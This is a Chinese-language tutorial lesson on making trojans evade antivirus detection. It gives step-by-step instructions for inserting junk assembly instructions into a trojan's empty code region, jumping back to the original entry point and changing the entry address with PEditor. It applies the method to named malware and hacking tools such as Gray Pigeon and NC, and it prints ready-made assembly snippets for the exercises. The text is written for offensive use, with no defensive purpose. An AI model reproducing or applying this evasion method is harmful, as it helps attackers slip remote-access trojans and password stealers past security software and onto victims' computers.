木马免杀之加壳与改入口点法

一.花指令相关知识：
　其实是一段垃圾代码，和一些乱跳转，但并不影响程序的正常运行。加了花指令后，使一些杀毒软件无法正确识别木马程序，从而达到免杀的效果。

二.加花指令使木马免杀制作过程详解：
　　第一步：配置一个不加壳的木马程序。
　　第二步：用OD载入这个木马程序，同时记下入口点的内存地址。
　　第三步：向下拉滚动条，找到零区域（也就是可以插入代码的都是0的空白地方）。并记下零区域的起始内存地址。
　　第四步：从这个零区域的起始地址开始一句一句的写入我们准备好的花指令代码。
　　第五步：花指令写完后，在花指令的结束位置加一句：JMP　刚才OD载入时的入口点内存地址。
　　第六步：保存修改结果后，最后用PEditor这款工具打开这个改过后的木马程序。在入口点处把原来的入口地址改成刚才记下的零区域的起始内存地址，并按应用更改。使更改生效。

三.加花指令免杀法实例演示部分：

实例演示一：NC加花指令免杀演示过程。
实例演示二：阿拉大盗主程序免杀之加花指令和入口点加1法综合应用。
实例演示三：阿拉大盗主程序免杀之加不同花指令免杀演示(作业）

　　综合实例演示：灰鸽子MINI版主程序免杀操作过程：
　　　　　　　　　1>.加花指令
　　　　　　　　　2>. 入口点加1
　　　　　　　　　3>.变换入点地址法

　　　　　　　　
四.加花指令免杀技术总节：
　1.优点：通用性非常不错，一般一个木马程序加入花指令后，就可以躲大部分的杀毒软件，不像改特征码，只能躲过某一种杀毒软件。
　2.缺点：这种方法还是不能过具有内存查杀的杀毒软件，比如瑞星内存查杀等。
　3.以后将加花指令与改入口点，加壳，改特征码这几种方法结合起来混合使用效果将非常不错。
好了，今天的课就结束了，下节课再见！

实践操作：
1.把黑客工具NC加一段VC＋＋花指令代码以达到免杀效果，最后测试能否正常使用
VC++程序的入口代码:
PUSH EBP 
MOV EBP,ESP 
PUSH -1 
push 415448 -\___
PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填 
MOV EAX,DWORD PTR FS:[0] 
PUSH EAX 
MOV DWORD PTR FS:[0],ESP 
ADD ESP,-6C 
PUSH EBX 
PUSH ESI 
PUSH EDI 
ADD BYTE PTR DS:[EAX],AL /这条指令可以不要!
jo 00401000 /原入口
jno 00401000 /原入口
db 0e8h 

2.把黑客工具SNIFF加下面一段花指令，并结合入口点加1，最后测试能否正常使用
push ebp
mov ebp,esp
inc ecx
push edx
nop
pop edx
dec ecx
pop ebp
inc ecx
jmp （木马刚载入时的入口地址）

3.把黑客工具Findpass加以下一段花指令，以达免杀效果，并测试使用是否正常。
mov ebp,esp
add esp,+0C
add esp,-0C
mov eax,00401000 00401000填你修改程序的原始入口地址<注意>~!!
push eax
retn